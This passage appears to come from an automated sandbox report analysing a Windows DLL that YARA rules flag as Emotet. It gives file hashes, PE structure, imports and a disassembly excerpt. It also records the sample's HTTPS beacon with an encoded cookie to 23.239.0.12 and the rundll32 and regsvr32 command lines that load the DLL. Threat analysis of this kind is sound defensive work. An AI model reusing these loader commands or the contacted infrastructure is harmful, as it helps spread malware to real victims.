                                                                                                                                              • 23.239.0.12
                                                                                                                                              1V4gPPcQvB.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              No context
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8192
                                                                                                                                              Entropy (8bit):0.3593198815979092
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                              MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                              SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                              SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                              SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:MPEG-4 LOAS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):0.24942941386657713
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4b:BJiRdwfu2SRU4b
                                                                                                                                              MD5:92FA90065EB20CADFD4C426077F6CF97
                                                                                                                                              SHA1:C2942B7B23FB26BE8F46C6AB144C3C7513922B69
                                                                                                                                              SHA-256:628B2C61D6FDEFB1ED7FAA5C7B9EFE976EF49D5DFA0D4B6CEFF40ADA71CF8610
                                                                                                                                              SHA-512:782B7B16F0DB36AAFDE5BC12F68A920092BF0C510C5D8F4C567EE4CEFB222E8862EFB73D3C5D839451E3B31F9632FBAB16AA292D4084820C38E8FC26E7346D68
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1b5904bc, page size 16384, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):786432
                                                                                                                                              Entropy (8bit):0.25070365724330107
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:vjI+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:vj3SB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                              MD5:2BCA51DB084D2F45C4C2E1B336ACF7DC
                                                                                                                                              SHA1:DD5EA5C0C36C473218B3B3E7E427E077BF98EB55
                                                                                                                                              SHA-256:C39BC16F5D03D79752AAB5F74DC3083FAFD4B9976C232E082B8C3BA6F23C5290
                                                                                                                                              SHA-512:38D9E6832B9E43CB340C70E6CB688501797C504FBEFC4E5E067521972A8AF9F58C7D91A54F818AFDCF82981E72DF8B64A966CDB1713D09704147651976BB5C4C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.Y..... ................e.f.3...w........................).....4....z!.*....z[.h.(.....4....z!...)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................%[..4....z!....................x4....z!.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.07655236632374436
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:tSlJ7vP+p80YIa0OraIafJltabgfAqll3Vkttlmlnl:IJr2WVRraIUJXabaV3
                                                                                                                                              MD5:15A9EE8DCDF353993B102390479A2CB3
                                                                                                                                              SHA1:8B7DF91689FAF65EA1FBEE931B4DB3E5081BCD01
                                                                                                                                              SHA-256:352992ECC72BFDE9334DB4C101A54982B59E07FA012D3C24E396986B1FF8DB23
                                                                                                                                              SHA-512:E8160D6F18667F487947259F538D6A779B8F38569FCDB1D041892385FC8FE4548BB10B112608C131C16AB585A08C135B54B065B91354F8970BC724C04B9688EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:*;?N.....................................3...w..*....z[.4....z!.........4....z!.4....z!..s..4....zIw...................x4....z!.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):55
                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):9062
                                                                                                                                              Entropy (8bit):3.1639925343549455
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zG3+9t:j+s+v+b+P+m+0+Q+q+73+9t
                                                                                                                                              MD5:F96814DD7E3AE0B722D90299D9D921ED
                                                                                                                                              SHA1:6DF4F9CBCF150250AC4B987FDFAFA7BD1973B846
                                                                                                                                              SHA-256:E7254601F4863AA892D88FB202BFB084AB971888DE051BEE89AB7B3FC82C4A03
                                                                                                                                              SHA-512:09C4FF705C7B8C34BA1E311C66122AAD9BB5B20546F1ADEEB593D2762DD1B8BB900EA92DE3A2478AB305A120B5ECD00627CF4001CFE66A6777747D2981E7C5AE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                              Entropy (8bit):6.482092294480976
                                                                                                                                              TrID:
                                                                                                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                              • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                              File name:auExrOTnvB.dll
                                                                                                                                              File size:545280
                                                                                                                                              MD5:e7d280d6c63840b28ca759ff07747ea1
                                                                                                                                              SHA1:581dba2d1101e09dfeb290059c632ab266da49e3
                                                                                                                                              SHA256:a1637271aa4a35c54d8df7f9c62bb31ae3bf58c9c390bc1b1ce717cdf3eaeb2c
                                                                                                                                              SHA512:a10bb287a791f071e18276bae776613146c79f1e7c462be93053ebaa3d7cc277afd66d9dc6d8d0585f31610f8472bf408b7260d96a9aee3243f50dff9510ef64
                                                                                                                                              SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZwHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVU
                                                                                                                                              TLSH:3CC4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                                                                                              Icon Hash:74f0e4ecccdce0e4
                                                                                                                                              Entrypoint:0x1800423a8
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x180000000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                              Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:5
                                                                                                                                              OS Version Minor:2
                                                                                                                                              File Version Major:5
                                                                                                                                              File Version Minor:2
                                                                                                                                              Subsystem Version Major:5
                                                                                                                                              Subsystem Version Minor:2
                                                                                                                                              Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                                                                                              Instruction
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+08h], ebx
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+10h], esi
                                                                                                                                              push edi
                                                                                                                                              dec eax
                                                                                                                                              sub esp, 20h
                                                                                                                                              dec ecx
                                                                                                                                              mov edi, eax
                                                                                                                                              mov ebx, edx
                                                                                                                                              dec eax
                                                                                                                                              mov esi, ecx
                                                                                                                                              cmp edx, 01h
                                                                                                                                              jne 00007F6960CC4CA7h
                                                                                                                                              call 00007F6960CC6E34h
                                                                                                                                              dec esp
                                                                                                                                              mov eax, edi
                                                                                                                                              mov edx, ebx
                                                                                                                                              dec eax
                                                                                                                                              mov ecx, esi
                                                                                                                                              dec eax
                                                                                                                                              mov ebx, dword ptr [esp+30h]
                                                                                                                                              dec eax
                                                                                                                                              mov esi, dword ptr [esp+38h]
                                                                                                                                              dec eax
                                                                                                                                              add esp, 20h
                                                                                                                                              pop edi
                                                                                                                                              jmp 00007F6960CC4B50h
                                                                                                                                              int3
                                                                                                                                              int3
                                                                                                                                              int3
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+08h], ecx
                                                                                                                                              dec eax
                                                                                                                                              sub esp, 00000088h
                                                                                                                                              dec eax
                                                                                                                                              lea ecx, dword ptr [00014D05h]
                                                                                                                                              call dword ptr [0000FC7Fh]
                                                                                                                                              dec esp
                                                                                                                                              mov ebx, dword ptr [00014DF0h]
                                                                                                                                              dec esp
                                                                                                                                              mov dword ptr [esp+58h], ebx
                                                                                                                                              inc ebp
                                                                                                                                              xor eax, eax
                                                                                                                                              dec eax
                                                                                                                                              lea edx, dword ptr [esp+60h]
                                                                                                                                              dec eax
                                                                                                                                              mov ecx, dword ptr [esp+58h]
                                                                                                                                              call 00007F6960CD382Ah
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+50h], eax
                                                                                                                                              dec eax
                                                                                                                                              cmp dword ptr [esp+50h], 00000000h
                                                                                                                                              je 00007F6960CC4CE3h
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+38h], 00000000h
                                                                                                                                              dec eax
                                                                                                                                              lea eax, dword ptr [esp+48h]
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+30h], eax
                                                                                                                                              dec eax
                                                                                                                                              lea eax, dword ptr [esp+40h]
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+28h], eax
                                                                                                                                              dec eax
                                                                                                                                              lea eax, dword ptr [00014CB0h]
                                                                                                                                              dec eax
                                                                                                                                              mov dword ptr [esp+20h], eax
                                                                                                                                              dec esp
                                                                                                                                              mov ecx, dword ptr [esp+50h]
                                                                                                                                              dec esp
                                                                                                                                              mov eax, dword ptr [esp+58h]
                                                                                                                                              dec eax
                                                                                                                                              mov edx, dword ptr [esp+60h]
                                                                                                                                              xor ecx, ecx
                                                                                                                                              call 00007F6960CD37D8h
                                                                                                                                              jmp 00007F6960CC4CC4h
                                                                                                                                              dec eax
                                                                                                                                              mov eax, dword ptr [eax+eax+00000000h]
                                                                                                                                              Programming Language:
                                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                                              • [LNK] VS2008 build 21022
                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                              • [EXP] VS2008 build 21022
                                                                                                                                              • [C++] VS2008 build 21022
                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rdata0x520000x3d5f0x3e00False0.355279737903data5.39324872925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                              .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                              RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                                                              RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                              DLLImport
                                                                                                                                              KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                                                              ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                                                                                              NameOrdinalAddress
                                                                                                                                              DllRegisterServer10x180042050
                                                                                                                                              DllUnregisterServer20x180042080
                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                              EnglishUnited States
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              May 14, 2022 05:17:55.550472021 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:55.550549984 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:55.550662041 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:55.706453085 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:55.706510067 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:56.245387077 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:56.245476961 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:56.604893923 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:56.604944944 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:56.605217934 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:56.605309010 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:56.608459949 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:56.652522087 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:57.470505953 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:57.470598936 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              May 14, 2022 05:17:57.470608950 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:57.470660925 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:57.471018076 CEST49747443192.168.2.323.239.0.12
                                                                                                                                              May 14, 2022 05:17:57.471040010 CEST4434974723.239.0.12192.168.2.3
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.34974723.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              2022-05-14 03:17:56 UTC0OUTGET / HTTP/1.1
                                                                                                                                              Cookie: atNMDL=8JgHocGxWkmbpKn0tdo/IhGKLaetTZOB/CiwzPMRN0PZhyEtDxX1w9ZLI3P1macWQoUNgjMjrDkFV/lcl2IUdBiaAKo/gu5s0aRFlnydObt5qsXc+/edR28d1nZ8xHaeYQHrD4ceCTW7KN3CrdFVrOL7q9OWe4HkOi3goo9OlcXUaAn+eDxsmLAXol1L25FR07tOlcKH8p3XLgKteJmTbxxCGtkK1PAkDHcHxGMAOGnU9j9YFxHv7IfNK/Gpzy6maq0gTlW77lz4Pep9U6Sgfe9I7o9D3xGrfSVCQRT4FKJSwZ8N4dh1GhrQvr/ywAH73tqOX8eJ8jwCp0YlcEzqrw2N9Ckstgco/YIpQ6fc
                                                                                                                                              Host: 23.239.0.12
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              2022-05-14 03:17:57 UTC0INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Sat, 14 May 2022 03:17:57 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              2022-05-14 03:17:57 UTC0INData Raw: 66 63 0d 0a ee f9 28 92 25 66 18 95 e0 c8 17 1f 2a a6 fd 7c 81 63 f4 3d 27 6e 11 d9 80 fc e2 cf 62 27 99 dc 44 6d b0 37 1e ab 0a c8 b3 1b 43 34 00 4b 2a 83 10 b7 90 43 31 f8 55 92 a0 a8 6b 5f 2b da d7 52 39 23 c1 0f 48 1b 66 70 4a 42 5a 9b 57 78 0a 63 f4 86 0c 1f f8 cd f3 e1 cd 94 b5 dd e7 ce 9d 5e 02 91 00 1e 34 d3 fd 7c 1c 6f 7c f0 3d a9 58 26 f7 6a 76 f8 80 2f 37 7c 1c b2 1e 7c bc 2b 7d 0c 46 32 2a d8 95 64 58 c5 9e 66 7c 98 22 31 8c 88 43 0e c1 49 bf 84 0a 16 d3 be 16 b6 bc 74 39 96 fd 43 88 37 2c c8 93 86 7f 2d 15 0c 66 b8 39 f4 3f ba d0 b5 35 f9 39 5c 9e 6e 1a c6 dc 2e 28 60 bd 6f 02 f9 e0 6a b4 29 eb 35 90 52 a4 8c 31 fb 20 55 fa 17 57 b7 98 75 15 db b3 d6 7d c4 6d 6b 47 2a 17 d0 66 d3 b4 64 2c 14 a5 e1 dc 11 13 41 8e 69 7b 91 f9 e5 40 2a 55 cf 39
                                                                                                                                              Data Ascii: fc(%f*|c='nb'Dm7C4K*C1Uk_+R9#HfpJBZWxc^4|o|=X&jv/7||+}F2*dXf|"1CIt9C7,-f9?59\n.(`oj)5R1 UWu}mkG*fd,Ai{@*U9


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:05:17:15
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:loaddll64.exe "C:\Users\user\Desktop\auExrOTnvB.dll"
                                                                                                                                              Imagebase:0x7ff775150000
                                                                                                                                              File size:140288 bytes
                                                                                                                                              MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:1
                                                                                                                                              Start time:05:17:16
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
                                                                                                                                              Imagebase:0x7ff6da490000
                                                                                                                                              File size:273920 bytes
                                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:05:17:16
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll
                                                                                                                                              Imagebase:0x7ff6ae680000
                                                                                                                                              File size:24064 bytes
                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.280524606.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:05:17:16
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
                                                                                                                                              Imagebase:0x7ff73c2a0000
                                                                                                                                              File size:69632 bytes
                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.278205273.000002ACE68D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:05:17:17
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer
